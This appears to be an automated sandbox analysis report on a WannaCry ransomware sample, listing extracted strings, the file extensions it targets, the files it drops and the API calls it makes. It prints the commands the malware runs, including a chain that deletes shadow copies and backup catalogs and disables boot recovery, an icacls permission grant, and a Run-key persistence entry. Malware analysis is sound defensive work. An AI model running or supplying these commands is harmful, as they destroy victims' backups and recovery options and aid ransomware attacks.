server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
                  Source: 2N2jefqo8e.exe, 00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Window found: window name: RICHEDIT
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe File opened: C:\Windows\SysWOW64\RICHED32.DLL
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: 2N2jefqo8e.exe Static file information: File size 3514368 > 1048576
                  Source: 2N2jefqo8e.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a000
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_00413060 push eax; ret 25_2_0041308E
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 29_2_00413060 push eax; ret 29_2_0041308E
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 38_2_00413060 push eax; ret 38_2_0041308E
                  Source: libeay32.dll.25.dr Static PE information: section name: /4
                  Source: libeay32.dll.25.dr Static PE information: section name: /19
                  Source: libeay32.dll.25.dr Static PE information: section name: /31
                  Source: libeay32.dll.25.dr Static PE information: section name: /45
                  Source: libeay32.dll.25.dr Static PE information: section name: /57
                  Source: libeay32.dll.25.dr Static PE information: section name: /70
                  Source: libeay32.dll.25.dr Static PE information: section name: /81
                  Source: libeay32.dll.25.dr Static PE information: section name: /92
                  Source: libevent-2-0-5.dll.25.dr Static PE information: section name: /4
                  Source: libevent-2-0-5.dll.25.dr Static PE information: section name: /19
                  Source: libevent-2-0-5.dll.25.dr Static PE information: section name: /31
                  Source: libevent-2-0-5.dll.25.dr Static PE information: section name: /45
                  Source: libevent-2-0-5.dll.25.dr Static PE information: section name: /57
                  Source: libevent-2-0-5.dll.25.dr Static PE information: section name: /70
                  Source: libevent-2-0-5.dll.25.dr Static PE information: section name: /81
                  Source: libevent-2-0-5.dll.25.dr Static PE information: section name: /92
                  Source: libevent_core-2-0-5.dll.25.dr Static PE information: section name: /4
                  Source: libevent_core-2-0-5.dll.25.dr Static PE information: section name: /19
                  Source: libevent_core-2-0-5.dll.25.dr Static PE information: section name: /31
                  Source: libevent_core-2-0-5.dll.25.dr Static PE information: section name: /45
                  Source: libevent_core-2-0-5.dll.25.dr Static PE information: section name: /57
                  Source: libevent_core-2-0-5.dll.25.dr Static PE information: section name: /70
                  Source: libevent_core-2-0-5.dll.25.dr Static PE information: section name: /81
                  Source: libevent_core-2-0-5.dll.25.dr Static PE information: section name: /92
                  Source: libevent_extra-2-0-5.dll.25.dr Static PE information: section name: /4
                  Source: libevent_extra-2-0-5.dll.25.dr Static PE information: section name: /19
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /4
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /19
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /31
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /45
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /57
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /70
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /81
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /92
                  Source: libssp-0.dll.25.drStatic PE information: section name: /4
                  Source: libssp-0.dll.25.drStatic PE information: section name: /19
                  Source: libssp-0.dll.25.drStatic PE information: section name: /31
                  Source: libssp-0.dll.25.drStatic PE information: section name: /45
                  Source: libssp-0.dll.25.drStatic PE information: section name: /57
                  Source: libssp-0.dll.25.drStatic PE information: section name: /70
                  Source: libssp-0.dll.25.drStatic PE information: section name: /81
                  Source: libssp-0.dll.25.drStatic PE information: section name: /92
                  Source: ssleay32.dll.25.drStatic PE information: section name: /4
                  Source: ssleay32.dll.25.drStatic PE information: section name: /19
                  Source: ssleay32.dll.25.drStatic PE information: section name: /31
                  Source: ssleay32.dll.25.drStatic PE information: section name: /45
                  Source: ssleay32.dll.25.drStatic PE information: section name: /57
                  Source: ssleay32.dll.25.drStatic PE information: section name: /70
                  Source: ssleay32.dll.25.drStatic PE information: section name: /81
                  Source: ssleay32.dll.25.drStatic PE information: section name: /92
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\m.vbsJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\u.wnryJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\Public\Desktop\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\taskdl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libssp-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\AppData\Local\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\Default\Desktop\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\ssleay32.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Desktop\taskse.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libeay32.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Users\user\Downloads\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\zlib1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SDF41B.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SDF41C.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDF41D.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SDF621.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SDF622.tmpJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile created: C:\$Recycle.Bin\~SDF25D.tmpJump to behavior
                  Source: @WanaDecryptor@.exe, 00000019.00000003.2894197945.00000000028B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onion-port
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,25_2_004067F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,29_2_004067F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,38_2_004067F0
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 37_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,LookupPrivilegeValueA,AdjustTokenPrivileges,_local_unwind2,WaitForSingleObject,_local_unwind2,37_2_00401000
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D30025_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D4C025_2_0040D4C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040D30029_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040D4C029_2_0040D4C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040D30038_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040D4C038_2_0040D4C0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_25-5437
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_29-4667
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_29-5519
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_38-5473
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI coverage: 8.5 %
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\taskdl.exeCode function: 7_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,7_2_00401080
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,25_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,25_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,25_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,29_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,29_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,29_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,38_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,38_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,38_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4857
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4868
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4814
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4692
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_29-4733
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_29-4750
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_29-5467
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_38-5163
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_38-5286
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_38-5262
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_38-5537
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDF307.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDF308.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SDF306.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDF303.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDF304.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SDF305.tmpJump to behavior
                  Source: @WanaDecryptor@.exe, 0000001D.00000003.2974699340.00000000004A8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2976210018.00000000004A9000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001D.00000003.2974512707.00000000004A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6617441365.00000000006A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00401BB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,25_2_00401BB0
                  Source: C:\Windows\SysWOW64\cscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,25_2_00406C20
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,29_2_00406C20
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,38_2_00406C20
                  Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00406F80 SendMessageA,CreateSolidBrush,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateFontA,CreateFontA,#1641,CreateFontA,#1641,CreateFontA,#1641,#3092,SendMessageA,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#860,#537,#537,#540,#2818,#535,#2818,#535,SendMessageA,SendMessageA,#6140,#6140,GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,SystemTimeToTzSpecificLocalTime,#2818,SystemTimeToTzSpecificLocalTime,#2818,#6334,#800,25_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040BED0 #823,GetComputerNameA,GetUserNameA,25_2_0040BED0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,25_2_0040D6A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,29_2_0040D6A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,38_2_0040D6A0
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
